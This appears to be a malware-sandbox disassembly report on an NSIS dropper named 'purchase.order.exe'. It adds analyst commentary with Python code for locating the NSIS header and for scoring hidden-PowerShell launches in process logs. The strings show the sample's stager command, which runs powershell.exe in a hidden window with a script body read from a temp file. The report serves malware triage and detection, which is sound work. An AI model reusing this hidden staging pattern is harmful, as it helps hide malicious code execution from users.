                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-3536805133
                                          • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                          • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                          • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                          • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                          Control-flow Graph
                                          • Rendered graph not reproduced (nodes were coloured Executed / Not Executed); the function spans 0x4030a2-0x4032d6.
                                          • Beyond the APIs listed below, the graph shows calls to the internal subroutines 0x406031, 0x406541, 0x405e5c, 0x40303e, 0x4034be, 0x4034d4, 0x4032d9, 0x405fec and 0x406a22, and a SetFilePointer call in the block at 0x4032b0 that the API list does not include.
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030B3
                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                            • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                            • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                          Strings
                                          • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403278
                                          • Inst, xrefs: 00403187
                                          • soft, xrefs: 00403190
                                          • Error launching installer, xrefs: 004030F2
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                          • Null, xrefs: 00403199
                                          • "C:\Users\user\Desktop\purchase.order.exe", xrefs: 004030A8
                                          • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                          Memory Dump Source
                                          • Same source file and associated dumps as listed for the function at 0x403fc1 above (00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true).
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                          • API String ID: 2803837635-1755445357
                                          • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                          • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                          • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                          • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
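
The string references of this function give away what it is: the stub opens its own image (GetModuleFileNameW, GetFileSize), reads it back and compares consecutive dwords against "Inst" (0x403187), "soft" (0x403190) and "Null" (0x403199), the NSIS "NullsoftInst" signature, before it reports "Installer integrity check has failed" or goes on to extract. A triage script that does the same locating and integrity check on a suspected NSIS dropper is useful when you want the embedded archive without running the sample. The Python below is an added example, not code from the report, the sample or the NSIS project: the first-header layout, flag bits and 512-byte scan step are taken from the NSIS exehead sources as I remember them and should be treated as assumptions, the function names are mine, and the installer image it parses is constructed inline.

```python
import struct
import zlib

# NSIS "firstheader" layout, from the NSIS exehead sources as I remember them
# (assumption; the signature values are the ones the sample's code compares).
FIRSTHEADER = struct.Struct("<II12sII")   # flags, siginfo, "NullsoftInst", length_of_header, length_of_all_following_data
FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"               # compared dword-wise as "Inst", "soft", "Null" (0x403187, 0x403190, 0x403199)
FH_FLAGS_MASK = 0x0F
FH_FLAGS = {0x1: "UNINSTALL", 0x2: "SILENT", 0x4: "NO_CRC", 0x8: "FORCE_CRC"}
SCAN_STEP = 512                          # the stub reads its own image in 512-byte chunks until the header turns up


def find_nsis_firstheader(buf: bytes):
    """Locate and decode the NSIS first header in a file image; None if there is none."""
    for off in range(0, len(buf) - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, siginfo, magic, header_len, data_len = FIRSTHEADER.unpack_from(buf, off)
        if siginfo != FH_SIG or magic != FH_MAGIC or flags & ~FH_FLAGS_MASK:
            continue
        if off + data_len > len(buf):
            continue   # truncated download: the stub reports this as an integrity failure as well
        return {
            "offset": off,
            "flags": [name for bit, name in FH_FLAGS.items() if flags & bit],
            "header_len": header_len,
            "data_len": data_len,
            "crc_checked": not flags & 0x4,   # simplification: ignores the /NCRC switch and FORCE_CRC
        }
    return None


def check_nsis_crc(buf: bytes, hdr: dict) -> bool:
    """The stored CRC32 is the last dword of the data block and covers every byte before it."""
    if not hdr["crc_checked"]:
        return True
    end = hdr["offset"] + hdr["data_len"]
    stored = struct.unpack_from("<I", buf, end - 4)[0]
    return (zlib.crc32(buf[:end - 4]) & 0xFFFFFFFF) == stored


def build_sample_installer(tamper: bool = False) -> bytes:
    """Constructed stand-in for purchase.order.exe: fake stub bytes, then an NSIS data block with CRC."""
    stub = b"MZ" + b"\x00" * 1022              # header lands on a 512-byte boundary, as in a real build
    header_blob = b"\x41" * 100                # stands in for the compressed NSIS header
    data_len = FIRSTHEADER.size + len(header_blob) + 4
    first = FIRSTHEADER.pack(0, FH_SIG, FH_MAGIC, len(header_blob), data_len)
    body = stub + first + header_blob
    image = bytearray(body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF))
    if tamper:
        image[len(stub) + FIRSTHEADER.size] ^= 0xFF   # flip one byte of the header blob
    return bytes(image)


if __name__ == "__main__":
    for tampered in (False, True):
        image = build_sample_installer(tamper=tampered)
        hdr = find_nsis_firstheader(image)
        print(hdr)
        print("CRC ok" if check_nsis_crc(image, hdr) else "Installer integrity check has failed")
```

On a real sample, feed the whole file to find_nsis_firstheader and, if the CRC holds, carve buf[offset:offset + data_len] for a dedicated NSIS unpacker; a CRC failure on a file pulled from a mail attachment usually means a truncated download rather than tampering, which is the same distinction the stub's error text draws.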

                                          Control-flow Graph
                                          • Rendered graph not reproduced (nodes were coloured Executed / Not Executed); the function spans 0x40657e-0x4067ec.
                                          • Beyond the APIs listed below, the graph shows calls to the internal subroutines 0x406541, 0x40640f, 0x406488, 0x4067ef and 0x406935, and a recursive call to 0x40657e itself.
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                          • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                          • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                          Strings
                                          Memory Dump Source
                                          • Same source file and associated dumps as listed for the function at 0x403fc1 above (00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true).
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                          • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                          • API String ID: 4024019347-1953292268
                                          • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                          • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                          • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                          • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
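
This function resolves system, Windows and shell-folder paths (GetSystemDirectoryW, GetWindowsDirectoryW, SHGetPathFromIDListW) and its string references contain the command the installer finally runs: powershell.exe -windowstyle hidden with a script that reads the dropped file under ...\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes with gc -raw. That combination, a hidden PowerShell window spawned by an executable in a user-writable directory whose script body is read back from %TEMP%, is what the report's "Suspicious Script Execution From Temp Folder" and "Suspicious powershell command line found" signatures are keyed on. The Python below is my own added detection example, not one of the report's Sigma rules and not code from the sample: the event field names follow Sysmon Event ID 1, the regexes and the threshold are my assumptions, and every event it scores is constructed (the first one mirrors the report's string with a closing quote added, since the original is cut off).

```python
import re

# Event fields follow Sysmon Event ID 1 naming (ParentImage, Image, CommandLine); all events below are constructed.
HIDDEN_WINDOW = re.compile(r"(?<![\w-])-w[a-z]*\s+(?:hidden|1)\b", re.I)   # -w / -win / -windowstyle hidden, or the numeric form
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData\\Local\\Temp)\\", re.I)
RAW_TEMP_READ = re.compile(
    r"\$\w+\s*=\s*(?:gc|cat|type|get-content)\s+-r(?:aw)?\s+['\"]?([a-z]:\\[^'\"]*?\\AppData\\Local\\Temp\\[^'\"]+)",
    re.I,
)


def score_event(evt: dict):
    """Score one process-creation event; 3 means every trait of the stager launch matched."""
    reasons = []
    if not evt["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, reasons
    cmd = evt["CommandLine"]
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window style")
    if USER_WRITABLE.search(evt["ParentImage"]):
        reasons.append("parent executable in a user-writable directory")
    m = RAW_TEMP_READ.search(cmd)
    if m:
        reasons.append("script body read raw from %TEMP%: " + m.group(1))
    return len(reasons), reasons


SAMPLE_EVENTS = [
    {   # modelled on the string in the report; the closing quote is added, the original is cut off
        "ParentImage": r"C:\Users\user\Desktop\purchase.order.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes'"''',
    },
    {   # benign maintenance script started by a service
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\cleanup.ps1",
    },
    {   # same suspicious parent, but the child is not PowerShell
        "ParentImage": r"C:\Users\user\Desktop\purchase.order.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe -w hidden",
    },
]


def triage(events=SAMPLE_EVENTS, threshold=3):
    """Return the events at or above threshold with their reasons, for the analyst's queue."""
    hits = []
    for evt in events:
        score, reasons = score_event(evt)
        if score >= threshold:
            hits.append({"parent": evt["ParentImage"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage():
        print(hit)
```

Each trait on its own is noisy (plenty of admin scripts hide their window), so the rule alerts only when all three line up; in a SIEM the same logic maps onto a Sysmon or 4688 query with the parent path, the -w/-windowstyle argument and the Get-Content -Raw read as separate selection clauses.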

                                          Control-flow Graph
                                          • Rendered graph not reproduced (nodes were coloured Executed / Not Executed); the function spans 0x401794-0x402c5e.
                                          • Beyond the APIs listed below, the graph shows calls to the internal subroutines 0x402dcb, 0x405e87, 0x406541, 0x405e10, 0x4067ef, 0x40689e, 0x406031, 0x40600c, 0x4055c6, 0x4032d9, 0x40657e and 0x405ba1, and SetFileTime and CloseHandle calls that the API list does not include.
                                          APIs
                                          • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,?,00000031), ref: 004017D5
                                          • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,?,00000031), ref: 004017FA
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                            • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                            • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                            • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                            • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                          Strings
                                          Memory Dump Source
                                          • Same source file and associated dumps as listed for the function at 0x403fc1 above (00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true).
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil$hadefuldeste\optjeningers\hottish
                                          • API String ID: 1941528284-1431457882
                                          • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                          • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                          • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                          • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                          Control-flow Graph
                                          control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 581 405626-40562a 580->581 582 40560b-40561b lstrlenW 580->582 585 405639-40563d 581->585 586 40562c-405633 SetWindowTextW 581->586 582->578 584 40561d-405621 lstrcatW 582->584 584->581 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                          APIs
                                          • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                          • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                          • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                          • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: daniglacial
                                          • API String ID: 2531174081-766043870
                                          • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                          • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                          • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                          • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

                                          Control-flow Graph
                                          control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 602 40333a-40335a GetTickCount call 406a90 600->602 603 40345e-403460 600->603 604 403477-403478 601->604 616 4034b4 602->616 618 403360-403368 602->618 606 403462-403465 603->606 607 4034a9-4034ad 603->607 605 4034b7-4034bb 604->605 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 624 4034b1 610->624 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 624->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->604 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->604 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 649 403412 641->649 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 648 40343e-403442 646->648 652 403429-40342b 647->652 648->630 651 403448 648->651 649->638 651->616 652->634 653 40342d-403430 652->653 653->648
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 551687249-2449383134
                                          • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                          • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                          • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                          • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

                                          Control-flow Graph
                                          control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                          • wsprintfW.USER32 ref: 00406917
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME
                                          • API String ID: 2200240437-1106614640
                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

                                          Control-flow Graph
                                          control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 0040607E
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-386316673
                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

                                          Control-flow Graph
                                          control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 774 402c4f-402c5e 758->774 759->774 776 401680-401683 759->776 763->764 767 401616-40161d call 405b0c 763->767 773 401631-401633 764->773 767->764 782 40161f-401627 call 405a95 767->782 778 401635-40163a 773->778 779 40164c-401654 773->779 776->774 780 401649 778->780 781 40163c-401647 GetFileAttributesW 778->781 779->755 779->756 780->779 781->779 781->780 782->773
                                          APIs
                                            • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe"), ref: 00405EC9
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                            • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                            • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil,?,00000000,000000F0), ref: 00401672
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil, xrefs: 00401665
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
